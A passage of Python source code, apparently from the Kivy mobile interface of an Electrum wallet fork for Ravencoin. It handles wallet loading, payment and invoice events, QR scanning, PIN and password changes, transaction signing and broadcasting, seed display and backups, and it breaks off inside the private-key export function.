self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Orientation of the device. Can be one of `landscape` or `portrait`.
:data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so that updates happen at most twice per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.ravencoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
warning = _(messages.MSG_LIGHTNING_WARNING)
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-ravencoin.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
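# divide by 1000 to convert from sat/kB to sat/byte for display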
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
self.logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
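# treat devices whose shorter side is larger than ~3.5 inches as tablets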
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
backup_dir = util.android_backup_dir()
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
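        # Watching-only wallets hold no private keys; otherwise prompt for the password/PIN
        # and display the decrypted key for the given address.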
if self.wallet.is_watching_only():
